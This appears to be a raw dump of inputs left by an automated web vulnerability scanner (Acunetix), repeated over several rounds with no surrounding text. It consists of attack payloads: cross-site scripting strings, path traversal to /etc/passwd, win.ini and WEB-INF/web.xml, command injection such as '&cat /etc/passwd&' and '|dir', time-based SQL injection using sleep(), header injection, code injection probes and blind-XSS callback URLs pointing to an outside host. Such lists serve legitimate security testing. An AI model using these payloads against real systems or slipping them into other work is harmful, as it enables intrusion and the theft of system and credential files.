)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

|dir

WEB-INF/web.xml

qI9Mikyb'

http://www.acunetix.tst

comments

'"

1

1

WEB-INF\web.xml

'|dir

g3TZWAfa')

1

comments/.

<!--

1

1'"()&%<ScRiPt >prompt(951158)</ScRiPt>

1

'"()&%<ScRiPt >prompt(937665)</ScRiPt>

zITMZeyw'))

../../../../../../../../../../windows/win.ini

"|dir

1

1

1

1

1_978424

1

../../../../../../../../../../boot.ini

1

1

1

1

acu7729<s1﹥s2ʺs3ʹuca7729

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acux3526z1z2abcxuca3526

1

1

windowswin.ini

1

1

1<ScRiPt >prompt(917989)</ScRiPt>

1

1

................windowswin.ini

1

1

1<script>prompt(997298)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<ScRiPt >prompt(997574)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?979149></ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(993566)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(927610)">

WEB-INF/web.xml

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(964598)"></g></svg>

WEB-INF\web.xml

1<div style=width:expression(prompt(931246))>

1

1

1

1<iframe src='data:text/html

1

response.write(9041623*9709648)

1

1<body onload=prompt(977708)>

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(905788)>

'+response.write(9041623*9709648)+'

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1<img src=xyz OnErRor=prompt(957681)>

1

"+response.write(9041623*9709648)+"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1<img/src=">" onerror=alert(964577)>

1

../../../../../../../../../../etc/passwd

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1<ScRiPt%20>prompt(900096)</sCripT>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

-1

1

cat /etc/passwd

1

1&lt

-1

../../../../../../../../../../etc/passwd.jpg

1

1

1

`cat /etc/passwd`

1

<img acu onmouseover=prompt(918273) //>

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

${100022+99977}

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

|cat /etc/passwd#

1

1<input autofocus onfocus=prompt(928788)>

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&n980840=v941606

1some_inexistent_file_with_long_name%00.jpg

'|'ld

)

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

<a href='http://www.acunetix.com'>website security</a>

x5an4QYa'

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

!(()&&!|*|*|

[url=http://www.acunetix.com]website security[/url]

.\./.\./.\./.\./.\./.\./etc/passwd

HtUMrNE7')

'"()

1

testasp.vulnweb.com

^(#$!@#$)(()))******

1_eo8Dx <ScRiPt >prompt(990066)</ScRiPt>

1

/etc/passwd

ylPtoZaT'))

1

1

'

'

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

"

"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1)

................etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

1

1

1

-1))

1

1

1

&dir

${@print(md5(acunetix_wvs_security_test))}\

1

1

http://hitJPI9N8HjR6.bxss.me/

lI1bZgtM'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

file:///etc/passwd

1

'&dir&'

1

acunetix_wvs_invalid_filename

1

1

1

ZPTxGFo4')

1

/\../\../\../\../\../\../\../etc/passwd

1

"&dir&"

comments

http://www.acunetix.tst

1

'"

mOW7PLFY'))

WEB-INF/web.xml

1'"()&%<ScRiPt >prompt(996636)</ScRiPt>

1

|dir

comments

1

1

<!--

1

WEB-INF\web.xml

'"()&%<ScRiPt >prompt(934775)</ScRiPt>

1

'|dir

comments/.

1

../../../../../../../../../../windows/win.ini

1

1

1_977765

1

"|dir

1

../../../../../../../../../../boot.ini

1

1

1

1

acu10277<s1﹥s2ʺs3ʹuca10277

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acux10404z1z2abcxuca10404

1

windowswin.ini

1<ScRiPt >prompt(993025)</ScRiPt>

1

1

1

1

................windowswin.ini

1<script>prompt(939835)</script>

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(931956)</ScRiPt>

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?905910></ScRiPt>

1

1

1

1<ScRiPt >prompt(958417)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(957883)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(919377)"></g></svg>

1

WEB-INF/web.xml

1<div style=width:expression(prompt(905758))>

1

1<iframe src='data:text/html

1

WEB-INF\web.xml

response.write(9872960*9843162)

1<body onload=prompt(953858)>

1

1

1

'+response.write(9872960*9843162)+'

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(908429)>

1

1

"+response.write(9872960*9843162)+"

1

1

&cat /etc/passwd&

1<img src=xyz OnErRor=prompt(978115)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(11.359),0)/*'XOR(if(now()=sysdate(),sleep(11.359),0))OR'"XOR(if(now()=sysdate(),sleep(11.359),0))OR"*/

'&cat /etc/passwd&'

1<img/src=">" onerror=alert(941118)>

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(11.359)))v)/*'+(select(0)from(select(sleep(11.359)))v)+'"+(select(0)from(select(sleep(11.359)))v)+"*/

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt%20>prompt(986494)</sCripT>

1

SomeCustomInjectedHeader:injected_by_wvs

1

-1

cat /etc/passwd

1

../../../../../../../../../../etc/passwd.jpg

1

1&lt

1

1

-1)

1

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

<img acu onmouseover=prompt(923808) //>

1

1

1

1

-1))

${99798+99315}

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<input autofocus onfocus=prompt(984878)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n957536=v999600

'|'ld

1

Mp2er0qO'

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

<a href='http://www.acunetix.com'>website security</a>

1

1some_inexistent_file_with_long_name%00.jpg

)

r3Es35os')

"|"ld

1

.\./.\./.\./.\./.\./.\./etc/passwd

[url=http://www.acunetix.com]website security[/url]

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1_1Kqrz <ScRiPt >prompt(908402)</ScRiPt>

Izd5RwsT'))

1

/etc/passwd

'"()

1

testasp.vulnweb.com

'

^(#$!@#$)(()))******

1

'

-1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

"

1

"

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

${@print(md5(acunetix_wvs_security_test))}

1

-1))

||cat /etc/passwd

................etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

&dir

tC4tB6Re'

1

http://hitQ9hjhxt72r.bxss.me/

1

1

acunetix_wvs_invalid_filename

'&dir&'

renatEnl')

1

file:///etc/passwd

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

comments

"&dir&"

mmMEW3r0'))

/\../\../\../\../\../\../\../etc/passwd

1

1

1

http://www.acunetix.tst

|dir

'"

comments

1

1

WEB-INF/web.xml

'|dir

1

1'"()&%<ScRiPt >prompt(973902)</ScRiPt>

1

<!--

comments/.

1

1

WEB-INF\web.xml

"|dir

1

'"()&%<ScRiPt >prompt(985492)</ScRiPt>

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1_999589

1

1

1

1

../../../../../../../../../../boot.ini

1

acu7272<s1﹥s2ʺs3ʹuca7272

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acux10065z1z2abcxuca10065

1

1

windowswin.ini

1

1<ScRiPt >prompt(962444)</ScRiPt>

1

1

1

................windowswin.ini

1

1<script>prompt(975823)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(906875)</ScRiPt>

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?943172></ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(957072)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(967749)">

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(972740)"></g></svg>

WEB-INF/web.xml

1

1<div style=width:expression(prompt(909123))>

WEB-INF\web.xml

1

1<iframe src='data:text/html

response.write(9376170*9901008)

1

1

'+response.write(9376170*9901008)+'

1

1<body onload=prompt(951552)>

1

1

"+response.write(9376170*9901008)+"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(986966)>

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=xyz OnErRor=prompt(990036)>

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<img/src=">" onerror=alert(999762)>

"&cat /etc/passwd&"

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1<ScRiPt%20>prompt(939613)</sCripT>

cat /etc/passwd

1

-1

../../../../../../../../../../etc/passwd.jpg

1

1

1

`cat /etc/passwd`

1&lt

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

${99426+99768}

1

-1)

-1))

1

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

<img acu onmouseover=prompt(981862) //>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

cVpkxFpZ'

'|'ld

1&n910819=v947561

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<input autofocus onfocus=prompt(944680)>

)

1some_inexistent_file_with_long_name%00.jpg

1

J7guPgaW')

"|"ld

1

!(()&&!|*|*|

.\./.\./.\./.\./.\./.\./etc/passwd

<a href='http://www.acunetix.com'>website security</a>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

1

D6PO92ee'))

^(#$!@#$)(()))******

/etc/passwd

[url=http://www.acunetix.com]website security[/url]

1

testasp.vulnweb.com

1

'

-1

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1_fz4q7 <ScRiPt >prompt(979855)</ScRiPt>

1

1

1

"

"

-1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

||cat /etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}

-1)

1

................etc/passwd

1

1

1

&dir

1

${@print(md5(acunetix_wvs_security_test))}\

-1))

1

1

http://hitmNf8lWOqpf.bxss.me/

'&dir&'

1

file:///etc/passwd

1

GRSvTd4w'

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

acunetix_wvs_invalid_filename

comments

1

"&dir&"

1

1

/\../\../\../\../\../\../\../etc/passwd

P7EMpJNE')

1

1

comments

1

http://www.acunetix.tst

|dir

WEB-INF/web.xml

1

fSP5s6yl'))

1'"()&%<ScRiPt >prompt(933766)</ScRiPt>

'"

comments/.

1

1

'|dir

<!--

WEB-INF\web.xml

1

1

'"()&%<ScRiPt >prompt(948288)</ScRiPt>

1

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1_991552

1

1

1

1

../../../../../../../../../../boot.ini

1

acu7782<s1﹥s2ʺs3ʹuca7782

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acux3503z1z2abcxuca3503

1

1

1

1<ScRiPt >prompt(949740)</ScRiPt>

windowswin.ini

1

1<script>prompt(952600)</script>

1

1

................windowswin.ini

1

1

1<ScRiPt >prompt(946719)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?968379></ScRiPt>

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1<ScRiPt >prompt(992901)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<video><source onerror="javascript:prompt(933291)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(924522)"></g></svg>

1

1

1<div style=width:expression(prompt(954583))>

1

1

1

1<iframe src='data:text/html

WEB-INF/web.xml

1

WEB-INF\web.xml

1<body onload=prompt(913254)>

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(983515)>

1

1

1<img src=xyz OnErRor=prompt(984026)>

1

response.write(9110625*9039760)

1

'+response.write(9110625*9039760)+'

1<img/src=">" onerror=alert(981969)>

1

&cat /etc/passwd&

1

1

1

1<ScRiPt%20>prompt(991474)</sCripT>

"+response.write(9110625*9039760)+"

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1

1

1&lt

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

"&cat /etc/passwd&"

1

1

<img acu onmouseover=prompt(941220) //>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

-1

1

1<input autofocus onfocus=prompt(979524)>

../../../../../../../../../../etc/passwd.jpg

1

1

`cat /etc/passwd`

${100299+99011}

1

1

-1)

<a href='http://www.acunetix.com'>website security</a>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

1

1

1

-1))

1

[url=http://www.acunetix.com]website security[/url]

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1some_inexistent_file_with_long_name%00.jpg

'|'ld

1&n932545=v973728

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1))

1

1_WlnEb <ScRiPt >prompt(929493)</ScRiPt>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

!(()&&!|*|*|

1

MzOsRCGW'

.\./.\./.\./.\./.\./.\./etc/passwd

1

'"()

1

testasp.vulnweb.com

^(#$!@#$)(()))******

1

urpe0KLw')

/etc/passwd

1

1

'

1

'

1

1

gGXKBoQ4'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

"

1

"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

||cat /etc/passwd

1

1

-1)

${@print(md5(acunetix_wvs_security_test))}

1

................etc/passwd

1

&dir

acunetix_wvs_invalid_filename

1

http://hitXMcFOIvuRo.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

-1))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

'&dir&'

1

1

1

YtrdPbOp'

file:///etc/passwd

1

comments

1

http://www.acunetix.tst

1

'"

/\../\../\../\../\../\../\../etc/passwd

2eHjPhhf')

1'"()&%<ScRiPt >prompt(965422)</ScRiPt>

1

comments/.

"&dir&"

|dir

1

1

<!--

1

WEB-INF/web.xml

vCblCFdg'))

'"()&%<ScRiPt >prompt(949235)</ScRiPt>

1

'|dir

1

1

1

1

WEB-INF\web.xml

1

1_925756

"|dir

1

1

1

1

acu1625<s1﹥s2ʺs3ʹuca1625

../../../../../../../../../../windows/win.ini

1

1

1

1

acux2527z1z2abcxuca2527

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(992166)</ScRiPt>

1

1

windowswin.ini

1

1<script>prompt(948248)</script>

1

1<ScRiPt >prompt(916744)</ScRiPt>

1

................windowswin.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?986422></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

1<ScRiPt >prompt(962604)</ScRiPt>

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(969415)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(933666)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<div style=width:expression(prompt(954746))>

1

1

1<iframe src='data:text/html

1<body onload=prompt(907822)>

WEB-INF/web.xml

1

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(998115)>

1

response.write(9770792*9460177)

1

1

1<img src=xyz OnErRor=prompt(941290)>

1

'+response.write(9770792*9460177)+'

&cat /etc/passwd&

1

1<img/src=">" onerror=alert(916668)>

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9770792*9460177)+"

1<ScRiPt%20>prompt(905654)</sCripT>

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

../../../../../../../../../../etc/passwd

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1&lt

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

<img acu onmouseover=prompt(922119) //>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

../../../../../../../../../../etc/passwd.jpg

1

`cat /etc/passwd`

1

1

-1

1<input autofocus onfocus=prompt(989607)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

<a href='http://www.acunetix.com'>website security</a>

1

${100310+99625}

|cat /etc/passwd#

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

1&n974524=v900559

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

[url=http://www.acunetix.com]website security[/url]

1

1

1

-1))

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

"|"ld

1_ZVaiS <ScRiPt >prompt(902964)</ScRiPt>

)

http://testasp.vulnweb.com/t/xss.html?%00.jpg

X0woZHnT'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\./.\./.\./.\./.\./.\./etc/passwd

1

'"()

'

1

!(()&&!|*|*|

C4KdU5LE')

1

testasp.vulnweb.com

/etc/passwd

1

"

1

'

^(#$!@#$)(()))******

1

1

XApdsZko'))

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}

1

"

1

-1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

acunetix_wvs_invalid_filename

1

1

${@print(md5(acunetix_wvs_security_test))}\

http://hitEuQABzP8gg.bxss.me/

1

||cat /etc/passwd

1

-1)

................etc/passwd

comments

1

1

1

1

&dir

-1))

1

comments

1

1

1

TQ6IEKA9'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

'&dir&'

'"

1'"()&%<ScRiPt >prompt(984001)</ScRiPt>

comments/.

file:///etc/passwd

1

1

1

KUvAaRUf')

"&dir&"

1

'"()&%<ScRiPt >prompt(912092)</ScRiPt>

<!--

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

xMB6ZMuW'))

|dir

1_959355

WEB-INF/web.xml

1

1

1

1

1

'|dir

1

WEB-INF\web.xml

acu2428<s1﹥s2ʺs3ʹuca2428

1

1

"|dir

acux6879z1z2abcxuca6879

1

../../../../../../../../../../windows/win.ini

1

1

1

1<ScRiPt >prompt(938117)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1

1

1<script>prompt(931627)</script>

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(991117)</ScRiPt>

1

1

windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?921996></ScRiPt>

1

................windowswin.ini

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(909842)</ScRiPt>

1

1<video><source onerror="javascript:prompt(928587)">

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(959347)"></g></svg>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(962877))>

1

1<iframe src='data:text/html

response.write(9827454*9107676)

1

1

1<body onload=prompt(948794)>

1

WEB-INF/web.xml

'+response.write(9827454*9107676)+'

&cat /etc/passwd&

1

1

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(988215)>

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9827454*9107676)+"

'&cat /etc/passwd&'

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<img src=xyz OnErRor=prompt(978240)>

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1<img/src=">" onerror=alert(940827)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

1

1

-1

1<ScRiPt%20>prompt(965803)</sCripT>

../../../../../../../../../../etc/passwd.jpg

1

1

`cat /etc/passwd`

1

1&lt

1

${100357+100323}

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

<img acu onmouseover=prompt(951576) //>

-1))

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<input autofocus onfocus=prompt(957213)>

'|'ld

1

1

1some_inexistent_file_with_long_name%00.jpg

1

1&n961109=v996940

sQAM8jMf'

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

<a href='http://www.acunetix.com'>website security</a>

"|"ld

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

PjlVTgPz')

1

.\./.\./.\./.\./.\./.\./etc/passwd

!(()&&!|*|*|

'"()

[url=http://www.acunetix.com]website security[/url]

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

testasp.vulnweb.com

YhmAg4xC'))

/etc/passwd

^(#$!@#$)(()))******

1

1_B7dLd <ScRiPt >prompt(949238)</ScRiPt>

'

'

1

1

-1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

"

"

1

1

-1)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

http://hit91otud3a5m.bxss.me/

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

acunetix_wvs_invalid_filename

1

-1))

................etc/passwd

1

1

&dir

1

${@print(md5(acunetix_wvs_security_test))}\

1

comments

1

zhB3jX7B'

1

'&dir&'

1

1

'"

comments

http://www.acunetix.tst

EsKXP4hS')

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

file:///etc/passwd

1

1

"&dir&"

1

comments/.

<!--

ABx0y5nG'))

1

1'"()&%<ScRiPt >prompt(932753)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

|dir

1

1

1

1

'"()&%<ScRiPt >prompt(986361)</ScRiPt>

WEB-INF/web.xml

'|dir

1

1

1

1

1

1_947958

WEB-INF\web.xml

"|dir

1

1

1

../../../../../../../../../../windows/win.ini

1

acu7579<s1﹥s2ʺs3ʹuca7579

1

1

1

../../../../../../../../../../boot.ini

1

1

1

1

acux4695z1z2abcxuca4695

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(973814)</ScRiPt>

windowswin.ini

1

1

1

1<script>prompt(957556)</script>

................windowswin.ini

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(954257)</ScRiPt>

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?931315></ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(977203)</ScRiPt>

1

1

1

response.write(9486595*9851573)

1<video><source onerror="javascript:prompt(964396)">

1

WEB-INF/web.xml

1

1

'+response.write(9486595*9851573)+'

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(952220)"></g></svg>

&cat /etc/passwd&

WEB-INF\web.xml

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9486595*9851573)+"

../../../../../../../../../../etc/passwd

1

'&cat /etc/passwd&'

1<div style=width:expression(prompt(926301))>

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"&cat /etc/passwd&"

1

-1

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(961534)>

1

../../../../../../../../../../etc/passwd.jpg

1

cat /etc/passwd

1

-1)

1

1

${99052+99182}

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(983036)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

`cat /etc/passwd`

-1))

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<img src=xyz OnErRor=prompt(975488)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

|cat /etc/passwd#

9iWVDvjX'

1some_inexistent_file_with_long_name%00.jpg

1

1<img/src=">" onerror=alert(970105)>

1&n973117=v976504

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

'|'ld

)

bwsZh4dn')

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

